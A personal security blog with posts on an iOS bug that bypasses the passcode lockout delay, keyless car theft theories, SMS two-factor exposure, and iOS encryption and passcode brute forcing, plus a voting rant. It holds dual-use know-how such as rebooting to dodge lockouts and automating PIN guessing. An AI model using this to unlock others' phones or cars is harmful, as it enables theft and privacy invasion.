Darth Null’s Ramblings


Hello! I'm David Schuetz.
This is where I ramble about...stuff.

Bypassing the lockout delay on iOS devices

Apple released iOS 8.1.1 yesterday, and with it, a small flurry of bugs were patched (including, predictably, most (all?) of the bugs used in the Pangu jailbreak). One bug fix in particular caught my eye:

Lock Screen
Available for:  iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later
Impact:  An attacker in possession of a device may exceed the maximum number of failed passcode attempts
Description:  In some circumstances, the failed passcode attempt limit was not enforced. This issue was addressed through additional enforcement of this limit.
CVE-2014-4451 : Stuart Ryan of University of Technology, Sydney

We’ve seen lock screen “bypasses” before (that somehow kill some of the screen locking application and allow access to some data, even while the phone is locked). But this is the first time I’ve seen anything that could claim to bypass the passcode entry timeout or avoid incrementing the failed attempt count. What exactly was this doing? I reached out to the bug reporter on Twitter (@StuartCRyan), and he assured me that a video would come out shortly.

Well, the video was just released on YouTube, and it’s pretty interesting. Briefly:

This doesn’t appear to reset the attempt count to zero, but it keeps you from waiting between attempts (which can be up to a 60-minute lockout). Nor does it appear to increment the failure count, which means that if you’re currently at a 15-minute delay, the device will never go beyond that, and will never trigger an automatic memory wipe.

Combining this with something like iSEC Partners’ R2B2 Button Basher could easily yield something that could just carefully hammer away at PINs 24x7 until a hit is found (though it’d be SLOW, like 1-2 minutes per attempt…).
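Some quick arithmetic on that, assuming 90 seconds per attempt (my own midpoint of the 1-2 minute estimate above) and a worst-case search of the whole keyspace:

```python
# Back-of-the-envelope: how long would a robotic PIN basher need?
# The 90-second figure is an assumption, not a measured number.

def worst_case_days(digits: int, seconds_per_attempt: float = 90.0) -> float:
    """Worst-case time, in days, to exhaust an all-numeric PIN space."""
    attempts = 10 ** digits
    return attempts * seconds_per_attempt / 86400.0

print(f"4-digit PIN: {worst_case_days(4):.1f} days")   # ~10.4 days
print(f"6-digit PIN: {worst_case_days(6):.0f} days")   # ~1042 days
```

Slow, but with no escalating delay and no wipe, patience is the only requirement.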

Why this even works, I’m not sure. I had presumed that a flag is set somewhere, indicating how long a timeout is required before the next unlock attempt is permitted, which even persists through reboots (under normal conditions). One would think that this flag would be set immediately after the last failed attempt, but apparently there’s enough of a delay that, working at human timescales, you can reboot the phone and prevent the timeout from being written.

Presumably, the timeout and incorrect attempt count are now being updated as close to the passcode rejection as possible, blocking this demonstrated bug.

I may try some other devices in the house later, to see how far back I can repeat the bug. So far, I’ve personally verified it on an iPhone 5S running 8.1.0, and an iPad 2 on 7.0.3. Update: I was not able to make this work on an iPod Touch 4th generation, with iOS 6.1.6, but it’s possible this was just an issue with hitting the buttons just right (many times it seemed to take a screenshot rather than starting up the reboot). On the other hand, the same iOS version (6.1.6) did work on an iPhone 3GS, though again, it took a few tries to make it work.

Why I hate voting.

I just voted, even though pundits and statisticians have proven fairly definitively that my particular vote won’t matter. My district has had a Republican congressman for 30 years and his hand-picked heir is likely to win, and I don’t live in one of the 6 states all the news organizations tell me will decide control of the Senate. I voted because it’s the right thing to do, and because if I don’t vote, I lose the moral right to complain about the idiots in power (and anyone who knows me knows I love to complain.)

But why I hate voting isn’t the issues, or the parties, or the polarized electorate, or the aforementioned futility of my particular involvement. It’s the process. The process makes my blood boil.

For months, we are subjected to constant attack ads, literally he-said-she-said finger pointing about which candidate is the bigger idiot for siding with whichever other idiots are in power.

For weeks, the candidates clutter the countryside with illegally placed campaign signs that aren’t just an eyesore, but can seriously impede traffic safety simply by blocking drivers’ view of oncoming traffic. (Though to be fair, this has gotten much better in Fairfax County over the last few years…I don’t know how they got the candidates to stop, but I’m glad they did it).

I work at home, in my basement. When the doorbell rings, I answer it. Which means I have to interrupt my work, walk upstairs, and attend to whoever is at the door. And then get annoyed when it’s just someone stumping for a politician I don’t care about (or even one I do like). And then they get annoyed when I’m annoyed at them — as if they weren’t the ones being rude by disturbing me in the first place.

Go Away Humans

Then, finally, election day. That’s the worst.

Rather than experiencing relief that it’s all about to be over, my annoyance level spikes to new highs. First, I drop the kids off at their school (for school-provided daycare while the school is closed for election day). There’s no way to get through the front door without running a gauntlet of partisan party representatives handing you their “Sample Ballots” (which conveniently exclude all other parties — not actually a sample at all, but I suppose we’re used to the lies). Sure, there’s a “50 foot exclusion zone” around the entrance, but it’s not possible to park within that zone. So all they have to do is hover around the perimeters and they get you.

But at this point I’m not even there to vote — I’m just there to drop off my kids. (In fact, two Republican candidates even had people camped out in front of the school on Back to School night this year, so even then we weren’t able to escape their harassment). Why the school system doesn’t kick these people off their property is beyond me. (And don’t tell me it’s because of First Amendment rights — politicians can still express their views…they just shouldn’t be allowed to interrupt voters on their way to the polls).

It’s even worse today, because I’ll have to sneak past the same people for parent/teacher conferences this afternoon.

Then when I actually do go to vote, I have to navigate a different set of politicians’ antagonists (because my polling place is in a different school). And I have to present an ID to vote, because there’s an astronomically small chance that someone could be trying to vote illegally (which Never Ever Happens. Seriously.) And after I present my ID, the poll workers ask me to tell them my address — as if it weren’t already printed on my ID. Somehow, going to vote where the poll workers can’t even read the address on my ID doesn’t fill me with confidence.

(No, I know it’s because they want to be sure that I really know my address and am not simply taking someone else’s identity. It’s still bullshit. Next year, I’m reading the address from my ID before I even hand it to them. See what happens then.)

So by the time I’m done, I’ve been harassed by politicians on the radio, on the TV, in my mail, at my front door, on the way to drop off the kids, on my way to conferences with my kids’ teachers, on the way to actually vote, and then while voting, I’m told pretty clearly that the state doesn’t think I’m actually me and am trying to fraudulently cast a ballot. All this after being told again and again by, well, Science, that my vote really doesn’t matter.

It’s amazing that anyone votes at all.

What’s the deal with keyless entry car thefts?

In June of 2013, a few videos started circulating showing people unlocking cars without authorization. Basically, people walking directly up to a car and just opening it, or walking by cars on the street. One of the more interesting videos (watch at about 30 seconds in) showed a thief walking along the street, grabbing a handle in passing, and stopping short when the car unlocked. (interestingly, all the videos I found this morning showed attackers reaching for the passenger side door, which may just be a coincidence…)

Predictably, this was picked up by news organizations all over the world, who talked about the “big problem” this is in the US. Then I didn’t hear much again for a while.

It’s not even a particularly new thing. This story about BMW thefts in 2012 mentions key fob reprogramming, and also work presented by Don Bailey at Black Hat 2011 (in which he discussed starting cars using a text message).

But just recently, it’s been making the news again, with some insurers even reportedly refusing insurance for some vehicles.

But none of these reports really shed any light on what’s actually happening, though I suspect there are a couple of different problems at play. The more recent articles included some clues:

In a statement, Jaguar Land Rover said vehicle theft through the re-programming of remote-entry keys was an on-going problem which affected the whole industry.


“The challenge remains that the equipment being used to steal a vehicle in this way is legitimately used by workshops to carry out routine maintenance … We need better safeguards within the regulatory framework to make sure this equipment does not fall into unlawful hands and, if it does, that the law provides severe penalties to act as an effective deterrent.”

This sounds a lot like the current spate of articles is referring to key fob reprogramming via the OBDII port. Basically, if you get physical access to the car, you can connect something to the diagnostic port and program a new key to work with the car. Bingo, instant key, stolen car.

Then they seem to say that “this attack can be easily mitigated by simply ensuring that thieves don’t get the tightly controlled equipment to reprogram the car.” Heh. Right.

This attack relies on a manufacturer-installed backdoor designed for trusted third parties to do authorized work on the vehicle, and instead is being exploited by thieves. Sound familiar?

I’m actually surprised it’s this simple. I haven’t given it a lot of thought, but I’d bet there are ways this could be improved. Maybe a unique code given to the purchaser of the vehicle that they would keep at home (NOT in the glovebox!) and can be used to program new keys. If they lose that, some kind of trusted process between a dealer and the automaker could retrieve the code from some central store. Of course, that opens up social engineering attacks (a bit harder) and also attacks against the database itself (which only need to succeed once).

Again, this seems like a good real-world example of why backdoors are hard (perhaps nearly impossible) to do safely.

But what about the videos from last year? Those thieves certainly weren’t breaking a window and reprogramming keys…they just touched the car and it opened. For those attacks, something much more insidious seems to be happening, and frankly, I’m amazed that we haven’t figured it out yet.

The thieves might be hitting a button on some device in their pockets (or it’s just automatically spitting out codes in a constant stream) and occasionally they get one right. That seems possible, but improbable. The kinds of rolling codes some remotes use aren’t perfect (especially if the master seed is compromised) but I don’t think they can work that quickly, and certainly not that reliably. (But I could certainly be wrong — it’s been a while since I looked into this).
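For a sense of why blindly spraying codes is such a long shot, here is a toy rolling-code model. The hash, the window size, and the code length are all illustrative stand-ins of mine, not any real fob protocol:

```python
# Toy rolling-code remote: fob and car share a secret and a counter,
# and the car only accepts codes within a small look-ahead window.
import hashlib

SECRET = b"shared-fob-secret"

def code_for(counter: int) -> bytes:
    """The code the fob would transmit for a given counter value."""
    return hashlib.sha256(SECRET + counter.to_bytes(8, "big")).digest()[:4]

class Car:
    WINDOW = 256  # how far ahead of the last-seen counter we'll accept

    def __init__(self):
        self.counter = 0

    def try_unlock(self, code: bytes) -> bool:
        for c in range(self.counter + 1, self.counter + 1 + self.WINDOW):
            if code_for(c) == code:
                self.counter = c   # resync to the accepted counter
                return True
        return False

car = Car()
assert car.try_unlock(code_for(5))      # a legitimate press in the window
assert not car.try_unlock(code_for(5))  # replaying an old code fails
```

With a 4-byte code and a 256-code window, a random guess has roughly 256-in-4-billion odds, which is why the “constant stream of codes” theory seems improbable unless the scheme (or its master seed) is broken.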

Also, in these videos, the car didn’t respond until the thief actually touched the door handle. In a couple cases, they held the handle and then appeared to pause while they (perhaps) activated something in their other hand. I’ve wondered if this isn’t exploiting some of the newer “passive” keyless entry systems, where the fob stays in your pocket and is only activated when the car (triggered by a hand on the handle) triggers the fob remotely.

It’s possible there’s a backdoor or some unintended vulnerability in this keyfob exchange, and that’s what’s being exploited. Or even just a hardware-level glitch, like a “whitenoise attack” that simply overwhelms the receiver (as suggested to me this morning by @munin). I’ve also wondered how feasible it might be for a “proxy” attack against an almost nearby fob. For example, if the attacker touches the door handle, and the car asks “are you there, trusted fob?” the fob, currently sitting on the kitchen counter, isn’t within range of the car and so won’t respond. But if the attacker has a stronger radio in their backpack, could they intercept the signal and replay it at a much stronger level, then use a sensitive receiver to collect the response from inside the house and relay it back to the car?

This seems kind of far fetched, and there are probably a great many reasons (not least, Physics) why this might not work. Then again, we’ve demonstrated “near proximity” RFID over fairly large distances, too. And many people probably hang their keys next to the door to the garage, pretty close (within tens of feet) to the car.

It would also be reasonably easy to demonstrate. Too bad we had to sell our Prius to buy a minivan.

The bottom line is this: We’ve seen pretty solid evidence of thefts and break-ins against cars using keyless entry technology. The press love these stories as they drum up eyeballs every 6 months or so. But the public at large really doesn’t get any useful information other than “keyless is bad, mmkay?”

It’d be nice if we could figure out what’s going on and actually fix things.

iPhone SMS forwarding — cool, but may be risky

The recent release of iOS 8 brought with it several cool new features, especially some which more tightly integrate the iOS world with the OS X desktop world. Some of these are limited by physical proximity (like handing off email drafts among devices), while others require being on the same local subnet (forwarding phone calls to the desktop).

However, one feature apparently Just Works all the time, and that’s SMS message forwarding. If you have an iPhone running iOS 8, you can send and receive normal text messages (to your “Green bubble friends”) from your iPad or Yosemite desktop, even if the phone is the next town over.

This is actually pretty cool — I use text messaging a lot, and while most of the people I communicate with use iPhones, a fair number (especially customers) don’t. If I need to send them something securely, like a password to a document I just emailed them, I have to manually type the password into my iPhone and hope I don’t mess it up. With SMS messages bridged between the systems, now I can just copy out of my password safe and paste right into iMessage.

However, this does raise one possible security issue. Many services which offer Two-Factor Authentication (2FA, or as many prefer to call this particular brand of 2FA, “two-step authentication”) send the 2FA confirmation codes over SMS. The theory is that only the authorized user will have access to that user’s cell phone, and so the SMS will only be seen by the intended person.

But if your SMS messages are also copied to your iPad (which you left on your desk at work) or your laptop or desktop (which, likewise, may be left in the office, out of your control) then password reset messages sent over SMS will appear on those devices too.

Which means that your [fr]enemies at work may be able to easily gain control over some of your accounts, simply by requesting a password reset while you’re at lunch. And, since you’re really enjoying your three-bourbon lunch, you don’t even notice the messages appearing on your phone until it’s too late (at which point you’re alerted, not by the Twitter account reset, but by dozens of replies to the “I’m an idiot!” tweet your co-workers posted on your behalf.)

Fortunately, there’s an easy way to correct this.

In OS X Yosemite, go into the System Preferences application and select “Notifications.” Then go down to “Messages,” and where it says “Show message preview” make sure the pop-up is “when unlocked,” not “always.” If this is set to “when unlocked,” then the contents of SMS messages won’t be displayed when the desktop is locked, only a “you got a message” sort of notification. You might also consider disabling the “Show notifications on lock screen” button just above it, which will even disable the notification of the notification.

Yosemite SMS Notification Settings

In iOS, a similar setting can be found in Settings, also under Notifications:

iOS SMS Notification Settings

However, the control here isn’t quite as fine-grained — you can either show notifications on the lock screen, or not, and if they’re shown at all, then the contents will be displayed as well.

You might consider even preventing SMS notifications from displaying on your primary phone when locked, but if it’s almost never out of your control, then perhaps that’s not a big risk to worry about.

Note that both of these settings apply to iMessages as well as SMS messages.

If you never use SMS messages for account validation (whether you call them 2FA or 2SV or just “validation messages”), then you might not need to worry about this at all. Though it’s probably a good idea to at least consider disabling these notifications anyway…

Even more posts about iOS encryption

The assertion recently made by Apple that “it’s not technically feasible” to decrypt phones for law enforcement has really stirred up several pots.

Many in law enforcement are upset that Apple is “unilaterally” removing a key tool in their investigations (whether that tool has ever been truly “key” is another debate). Some privacy experts hail it as a great step forward. Others say “it’s about time.” And still others debate whether it’s quite as absolute a change as Apple’s making it sound.

I wrote extensively about this earlier this week, trying to pull together technical details from Apple’s “iOS Security” whitepaper and some key conference presentations. What’s amusing, now that I look through my archives, is that I said a lot of the same things 18 months ago.

As I was finishing this weekend’s post, Matthew Green posted a very good explanation as well, a bit higher on the readability scale without losing too many of the technical details. He later referred to my own post (thanks!) with an accurate note that we don’t know for certain whether the “5 second delay” in consecutive attempts can be overridden by Apple with a new Secure Enclave firmware.

Also later on Monday, Julian Sanchez published a less technical, much more analytic piece that’s worth reading for some of the bigger picture issues. His Cato Institute post is also a good read, to help understand why backdoors in general are a bad idea, and how this may turn out to be a rerun of the 1990’s Crypto Wars.

And just this morning, Joseph Bonneau posted a great practical analysis of the implications of self-chosen passcodes on the Freedom to Tinker blog. This latest story shows how even though, at a technical level, some strong passcodes may take years to break, in practical terms users don’t pick passcodes that are “random enough”. It even has a pretty graph.

One final suggestion made in Mr. Bonneau’s post (and also voiced by many others in posts or on twitter, including myself) is that a hardware-level “wrong passcode count” seems like a great idea. I’d been concerned about how to integrate that count with the user interface, but then he estimates that “A hard limit of 100 guesses would leave about 3% of users vulnerable” (based on the statistics he presents).

This almost throwaway comment made me wonder — if the user interface is (typically) configured to completely lock, or even wipe, a phone after 10 guesses, then why not let OS-level brute force attempts (initiated through the mythical Apple-signed external boot image) continue until 20 attempts? Then the hardware can simply refuse to attempt any further passcode key derivations, and not even worry about what to do with the phone (lock, wipe, or whatever). If the user has already hit 10 attempts through the UI, this count will never be reached in hardware anyway.
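That two-tier idea can be sketched with a toy class standing in for the secure hardware (the names and limits here are mine, purely for illustration):

```python
# Sketch of the two-tier limit idea: the OS lock screen enforces its
# usual 10-attempt limit, while the hardware hard-stops at 20 and
# simply refuses any further passcode key derivations.

class HardwareCounter:
    HARD_LIMIT = 20   # hardware ceiling; the UI would wipe/lock at 10

    def __init__(self):
        self.failures = 0

    def try_derive_key(self, correct: bool) -> bool:
        if self.failures >= self.HARD_LIMIT:
            raise RuntimeError("hardware refuses further derivations")
        if correct:
            self.failures = 0   # a good passcode resets the counter
            return True
        self.failures += 1
        return False
```

If the UI wipes the phone at 10 attempts, a legitimate user never reaches the hardware ceiling; only an attacker who bypasses the UI (say, via that mythical signed boot image) ever hits the hard stop.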

The only hard part about this idea would be finding a secure way for the secure element to know that the passcode was properly entered. If we rely on the operating system to verify the passcode and then notify the secure element, that notification may be subject to spoofing by an attacker. This may turn out to be an intractable problem, but I suspect it isn’t, and that a workable (or even elegant) solution can be found.

If Apple could add that level of protection, then even a 4-digit numeric passcode could be “strong enough” (provided they stay away from the top-50 or so bad passcodes). And at that point, it would absolutely be “technically infeasible” for Apple to do anything with a locked phone, other than retrieve totally unencrypted data.

A (not so) quick primer on iOS encryption

A few weeks ago, Apple published a message about Apple’s commitment to your privacy. In the section on Government Information Requests, Apple made the following somewhat startling statement:

On devices running iOS 8, your personal data such as photos, messages (including attachments), email, contacts, call history, iTunes content, notes, and reminders is placed under the protection of your passcode. Unlike our competitors, Apple cannot bypass your passcode and therefore cannot access this data. So it's not technically feasible for us to respond to government warrants for the extraction of this data from devices in their possession running iOS 8.

What exactly does this mean? And what was Apple doing before to support law enforcement? Well, to really understand that, we have to go kind of deep into how iOS encryption works. It’s complicated, and I’m not always the best at explaining things, but I’ll try my best.

To really understand it all, I highly recommend Apple’s iOS Security whitepaper. First released in May of 2012, with updates in October 2012, February 2014, and September 2014, the newest version (dated October 2014) includes changes to iOS 8. Also a great reference is “iPhone data protection in depth” by Jean-Baptiste Bédrune and Jean Sigwald of Sogeti, presented at HITB Amsterdam in 2011. Keep these open in other windows as I struggle to explain things. To truly understand what’s going on, those two references are your best bet.

In fact, I’ll probably find it convenient to refer back to these from time to time. I’ll call the iOS paper “ISG” and the HITB presentation “Sogeti”. I’m sure I’m totally butchering the proper way to cite sources, but I’ve been out of school for over 20 years, so give me a break, okay?

Another good reference is this talk from Black Hat Abu Dhabi 2011, by Andrey Belenko and Dmitry Sklyarov. The diagram on page 46 may be particularly helpful.

Too Long, Didn’t Read

Jump to the bottom.

Or go read Matthew Green’s much simpler explanation, which was posted after I’d finished writing my first draft of this post…

Where to begin?

Let me start by saying that I’m going to gloss over a lot of stuff here. This isn’t a formal presentation, it’s not a whitepaper, it’s not even meant to be a serious reference. This is in response to frustration trying to discuss this on twitter in 140-character bites.

So this is my “Tweet Longer” response. Think of it as the conversation (well, more like endless monologue you’re too polite to extricate yourself from) that I’d have with you if I ran into you at a con and you asked me how all this works.

Full Disk Encryption

Data on iPhones is encrypted.

Okay, glad that’s cleared up.

Well, it wasn’t at first. But starting with iOS 3.0 and the iPhone 3GS, the full filesystem was encrypted. The key for this encryption is not user-selectable, but depends on a UID which is “burned” into the phone’s chips at the factory (Sogeti, pp 4 and 5; also ISG, p 9). The UID is a 256-bit key “fused into the application processor during manufacturing.” Apple further states that “no software or firmware can read them directly”; software can only see the results of encryption or decryption operations using those keys.

The UID key is used to create a key called “key0x89b.” Key0x89b is used in encrypting the device’s flash disk. Because this key is unique to the device, and cannot be extracted from the device, it is impossible to remove the flash memory from one iPhone and transfer it to another, or to read it offline. (And when I say “Impossible,” what I really mean is “Really damned hard because you’d have to brute force a 256-bit AES key.”)

The exact mechanisms used to encrypt the storage are pretty complicated (see Sogeti, pp 31-39), so I won’t try to reproduce them here.

Of course, all of this is fully automatic. If you can get access to the file system, you can read the data — the decryption “just works.” The primary protections this adds are tying the flash storage to the physical device (as described above), and enabling an effectively instant wipe: destroy the key, and the data is unrecoverable.

But the data itself isn’t terribly well protected. If the device is unlocked, or if you can boot off an external drive and read the filesystem, then you can read everything.

Data Protection API

In iOS 4, Apple introduced the Data Protection API (DPAPI). Under DPAPI, several classes of protection were introduced for both files and keychain entries. I’ll focus on just files, but the concepts map relatively cleanly to keychain data as well.

Each file is individually encrypted with a “Class Key.” The class key is simply another random key, applied to any and all files which share the same DPAPI level. For example, all files marked as “FileProtectionComplete” use class 1 (Sogeti, p 15). There are currently four file protection classes, and four (nearly) analogous keychain protection classes (ISG, pp 10-13). The three classes most important to this discussion are:

- Complete Protection: the class key is encrypted with a key derived from the user’s passcode and the device UID, and the decrypted copy is wiped from memory whenever the device locks.
- Complete Until First Authentication: the same, except the decrypted class key remains in memory after the first unlock following a boot.
- No Protection: the class key is protected by the UID alone, so the data is readable regardless of the lock state.

The keys for all these classes are stored in a “keybag.” There are several keybags — one on the device (the “system keybag,”) another stored on trusted computers (for syncing and backing up devices), and another stored on MDM servers (to remotely unlock a device, in the event you’ve forgotten your passcode). (ISG, pp 14-15).

When a file is encrypted under (for example) “Complete” protection, the system extracts the appropriate class key from the keybag, and encrypts the file using that key. To decrypt the file, the key is again read from the keybag, and the file decrypted.
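Here’s a toy model of that flow. Real iOS uses hardware AES with keys that never leave the crypto engine; this standard-library sketch substitutes a SHA-256 keystream purely for illustration, and the keybag is just a dict of class keys:

```python
# Toy model of per-class file encryption: look up the class key in the
# keybag, encrypt/decrypt with it. NOT real crypto -- a keyed SHA-256
# keystream stands in for AES so the example stays stdlib-only.
import hashlib, os

keybag = {
    "NSFileProtectionComplete": os.urandom(32),
    "NSFileProtectionCompleteUntilFirstUserAuthentication": os.urandom(32),
    "NSFileProtectionNone": os.urandom(32),
}

def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    out, counter = b"", 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(8, "big")).digest()
        counter += 1
    return out[:length]

def protect(data: bytes, protection_class: str):
    key = keybag[protection_class]          # fetch the class key
    nonce = os.urandom(16)
    ct = bytes(a ^ b for a, b in zip(data, _keystream(key, nonce, len(data))))
    return nonce, ct

def unprotect(nonce: bytes, blob: bytes, protection_class: str) -> bytes:
    key = keybag[protection_class]          # fails if the key was wiped
    return bytes(a ^ b for a, b in zip(blob, _keystream(key, nonce, len(blob))))

nonce, blob = protect(b"secret mail", "NSFileProtectionComplete")
assert unprotect(nonce, blob, "NSFileProtectionComplete") == b"secret mail"
```

Locking the device corresponds to deleting the “Complete” entry from the in-memory keybag: after that, `unprotect` fails until an unlock restores the key.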

When you set (or change) a passcode, a key is derived using the system UID, and this key is then used to encrypt individual class keys within the keybag. The key derivation process is complicated, but essentially expands the passcode and a salt, using multiple rounds designed to take about 80 milliseconds, no matter the device. On newer devices (A7 or later processors, which is to say, iPhone 5S, 6, and 6+, the iPad Air, and the Retina iPad Mini) this is augmented with a 5-second delay between failed requests. This delay is added at the hardware level, while the escalating delays seen by the user at the lock screen are all part of the operating system. (ISG, p 11).
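The “about 80 milliseconds” tuning can be sketched with stock PBKDF2. Note this can’t model the UID entanglement (that key never leaves the hardware); it only shows how an iteration count gets calibrated to a target time on a given device:

```python
# Calibrate a PBKDF2 iteration count so one passcode-key derivation
# takes roughly a target wall-clock time on *this* machine, the way
# each iOS device tunes its own work factor. Illustrative only.
import hashlib, os, time

TARGET_SECONDS = 0.080  # the ~80 ms figure from the ISG

def calibrate_rounds(target: float = TARGET_SECONDS) -> int:
    salt = os.urandom(16)
    rounds = 1000
    while True:
        start = time.perf_counter()
        hashlib.pbkdf2_hmac("sha256", b"0000", salt, rounds)
        if time.perf_counter() - start >= target:
            return rounds
        rounds *= 2   # double until a single derivation is slow enough

rounds = calibrate_rounds()
print(f"~{rounds} rounds for about {TARGET_SECONDS * 1000:.0f} ms per guess")
```

A faster device simply ends up with a higher round count, so the per-guess cost stays roughly constant across hardware generations.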

Because the passcode key is “entangled” with the UID, it’s not possible to simply extract the encrypted keybag and brute force the passcode on a fast password cracking machine. The key must be decrypted on the device itself, which requires either a jailbroken device or a trusted external boot image (more on those later).

When you lock the device, the decrypted “complete protection” class key is wiped from memory. So the device can no longer read any file encrypted with that protection level, until it’s been unlocked again.

Default Data Protection

When Apple debuted the DPAPI, it was entirely an optional feature, and virtually no applications took advantage of it. For some time, the only Apple application which used any data protection was the Mail app. Under iOS 7, Apple changed the default to “Complete until first authentication”, and any new applications should use this protection level automatically.

Unfortunately, though 3rd party apps would inherit somewhat better protections, it wasn’t the best possible mode. Perhaps Apple left that as an option for developers to avoid making background use too difficult, or perhaps there were other reasons. And Apple opted to exclude most of their own applications from this new default.

Support to Law Enforcement

So what exactly was Apple doing to support police who need access to data on a seized iPhone or iPad? This has never been terribly clear. Every few months, a story seemed to hit the press about Apple unlocking phones for the police, but details were scarce, and speculation rampant.

As far as I have been able to guess, Apple had three avenues for extracting data from a seized iPhone:

- Using forensic tools (commercial or in-house) to extract whatever data they can reach
- Booting the device from a trusted, Apple-signed external image
- Brute forcing the user’s passcode
As for the first item, I don’t work in forensics and so can’t really speak to what these tools can do. But several open-source tools exist (in particular, the iphone-dataprotection kit by our friends at Sogeti) which can illustrate some of what’s possible.

However, much of the data extracted by these tools may be limited when the device is locked, and no forensic tool can directly bypass encryption provided on a locked device by DPAPI. (this changes if the forensic examiner has access to a desktop used to sync the device, but that’s a whole different blog post.)

Booting a Trusted Image

The second is a bit more complicated. Essentially, you’re booting the device using an external drive as the operating system. But since you’re still “on” the device, the locally-stored keys and UID are still available, and so the entire filesystem can be mounted and read. To prevent just anyone from doing this, iOS devices require the external image to be signed by Apple (so we can’t simply create our own drive and boot off that).

Fortunately (or unfortunately, depending on your point of view) there was a bug in the bootrom on several early iOS devices that allowed an attacker to bypass this signature requirement. So up until (and including) iPhone 4 and iPad 1, it was possible for anyone to perform this attack and extract any non-encrypted data (DPAPI protection level “None”) from the phone. Because the phone has to be rebooted in order to perform this attack, however, in-memory keys for the “complete” and “complete until first authentication” are lost, and so any data protected in those modes cannot be read, even using this approach.

Even Apple, booting from a trusted external image, can’t unlock those protected files. The class keys needed for decryption are stored in the system keybag, which is encrypted using the user’s passcode.

Brute Forcing a Passcode

Well, what about brute forcing a passcode? As I said above, older devices could be booted from an external drive, allowing full access to unencrypted files on the device filesystem. Also available are the library routines needed to decrypt the system keybag. And these routines (as far as we know) don’t have any rate limiting, escalating delays, or lockouts, so a program with access to the filesystem and this API can brute force as long as it needs to.

But the key derivation still needs to happen on the device itself, and each device has its work factor tailored so this takes about 80 ms per guess. So though a weak four-digit number could be cracked in 20 minutes or less, a strong alphanumeric passcode could still take months, years, or centuries to break.
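The arithmetic behind those estimates, assuming a worst-case search of the full keyspace (the charset sizes are my assumptions):

```python
# At 80 ms per on-device guess, worst-case crack time is just
# keyspace x 0.08 seconds.

SECONDS_PER_GUESS = 0.080

def worst_case_seconds(keyspace: int) -> float:
    return keyspace * SECONDS_PER_GUESS

print(f"4-digit PIN:  {worst_case_seconds(10**4) / 60:.0f} minutes")        # ~13 minutes
print(f"6-char alnum: {worst_case_seconds(62**6) / 86400 / 365:.0f} years") # ~144 years
```

Even a modest jump in passcode complexity moves the attack from a lunch break to longer than the attacker’s career.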

And once Apple patched the bootrom hole (beginning with the iPhone 4S and iPad 2), this became impossible for anyone outside of Apple to do anyway.

However, because the possibility remained that Apple could crack the passcode, most iOS security experts still recommend that users choose a strong passcode. Just in case.

There’s no evidence that Apple ever actually offered this as a service to law enforcement. I could see where they might, under the right circumstances, but I can also understand where they might be reluctant to ever offer such a service, for fear of it being abused (or just over-requested).

But by brute forcing the passcode, all the data protection is rendered useless.

What changed with iOS 8?

Two things changed with iOS 8:

The first change only affects anyone trying to brute force a passcode directly on a device, which means this only affects Apple (unless law enforcement, forensics teams, or wily hackers have access to a signed image).

The second change is somewhat more significant, under certain circumstances. A device which has been unlocked once already (since the last reboot) will behave exactly the same as iOS 7. That is, anything which is under the “Complete until first authentication” protection level will be (essentially) unencrypted, since the keys will remain in memory after the first time the user unlocks the device.

Much of the built-in application data was moved under the stricter controls: photos, messages, contacts, call history, etc. — all items which were described in the privacy message quoted way back when I started this. This data, once the phone’s been unlocked once, may still be available using 3rd party forensic tools. However, and here’s what I think is probably key: Once the phone is rebooted, that class key is lost, and the data is unreadable until the user enters their passcode again.

So even Apple, with a trusted external boot image, can’t access the data unless they crack the user’s passcode.

I think this is what Apple referred to when they said that it is “not technically feasible” to respond to warrants for this data.

Could Apple still attempt to brute force the passcode? Yes, possibly, if they've ever built that capability in the first place.

It’s also possible that Apple could (or already has) added brute-force protections to newer iOS hardware, which would prevent even Apple from breaking a user’s passcode. They’ve already added the 5-second delay (for A7-based devices), but whether the hardware enforces escalating delays for consecutive bad attempts has not been disclosed. I suspect that if it were the case, we’d’ve heard by now, but I’ve not personally tried brute forcing passcodes on anything newer than an iPad 1. Maybe this was added in iPhone 6 — but we’ll probably have to wait until they’re jailbroken to be sure.

A Quick Demo

If you’d like to see the difference between iOS 7 and iOS 8 for yourself, here’s a simple test.

  1. Get an iPhone running iOS 7, and another running iOS 8.
  2. Get a landline (or a 3rd cell phone) and make sure each iPhone has that number in its Contacts database (add a name, picture, etc.)
  3. Reboot both phones. Do not unlock either phone.
  4. Call the iOS 7 phone from the 3rd phone. You should see not only the phone’s number, but also the name and picture you put into the Contacts database.
  5. Call the iOS 8 phone. You should see the phone number, and nothing else (since most cellular providers don’t provide name over caller ID).
  6. Unlock the iOS 8 phone, then lock it again.
  7. Call the iOS 8 phone again, and this time, you should see the Contacts entry appear on the locked screen.

This shows how the Contacts database is locked with “complete until first authentication.” After rebooting, the phone simply does not have access to the Contacts database, because the class key is still safely encrypted in the system keybag. Once you unlock it, however, the key is extracted, decrypted, and retained in memory, so the next time you call, the phone can read Contacts and display the information.

(This is also why you can’t connect to your home Wi-Fi after rebooting the phone, but after you’ve unlocked it once, it remains connected even when locked. The keychain entries for Wi-Fi are stored with “complete until first authentication.”) (ISG, p13).
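My mental model of what's going on can be sketched as a tiny state machine (this is a toy model of the DPAPI class-key lifecycle, not Apple's actual implementation or API):

```python
# Toy model of DPAPI class-key availability. Class names follow the
# protection levels discussed above, not any real Apple API.
COMPLETE = "complete"
AFTER_FIRST_AUTH = "complete_until_first_authentication"
NONE = "none"

class Device:
    def __init__(self):
        self.keys_in_memory = set()   # decrypted class keys

    def reboot(self):
        self.keys_in_memory.clear()   # all in-memory class keys are lost

    def unlock(self, passcode_ok=True):
        if passcode_ok:               # passcode decrypts the system keybag
            self.keys_in_memory |= {COMPLETE, AFTER_FIRST_AUTH}

    def lock(self):
        self.keys_in_memory.discard(COMPLETE)   # AFTER_FIRST_AUTH persists

    def can_read(self, protection_class):
        return protection_class == NONE or protection_class in self.keys_in_memory

phone = Device()
phone.reboot()
print(phone.can_read(AFTER_FIRST_AUTH))  # False: Contacts unreadable after reboot
phone.unlock()
phone.lock()
print(phone.can_read(AFTER_FIRST_AUTH))  # True: readable once unlocked, even locked
```

This reproduces the demo above: the Contacts class key is unavailable after a reboot, but survives a lock once the user has unlocked the phone.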

So what about law enforcement?

Well, if the assumptions I am making here are correct (and it’s not just me — I believe many in the iOS security community have come to the same conclusion), then Apple simply cannot provide much beyond very basic forensic-level data on phones, especially once they’ve been powered off.

